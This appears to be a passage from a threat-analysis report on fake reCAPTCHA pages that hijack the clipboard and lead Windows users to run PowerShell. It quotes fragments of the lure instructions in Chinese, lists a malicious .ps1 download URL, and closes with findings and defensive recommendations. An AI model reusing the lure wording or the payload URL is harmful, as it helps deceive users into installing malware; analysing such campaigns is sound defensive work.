  2. 在验证窗口中,按 Ctrl + V。
  3. 按下键盘上的 Enter 键完成。

您将遵守并同意:
✠"I am not a robot - reCAPTCHA Verification ID: <span id="verification-id`

Comment Injection

Instances: 3 Examples: - # " const ploy = "

Attack Pattern Reconstruction

Malicious Download Sources

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

Key Findings

  1. Prevalence: 26.7% of analyzed sites contained malicious content
  2. Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking
  3. Target Platform: Windows systems via PowerShell execution
  4. Social Engineering: Sophisticated UI mimicking legitimate Google reCAPTCHA

Recommendations

  1. User Education: Warn users about fake CAPTCHA verification schemes
  2. Clipboard Monitoring: Implement clipboard monitoring for suspicious PowerShell commands
  3. URL Filtering: Block known malicious domains identified in this analysis
  4. PowerShell Execution Policy: Restrict PowerShell execution in corporate environments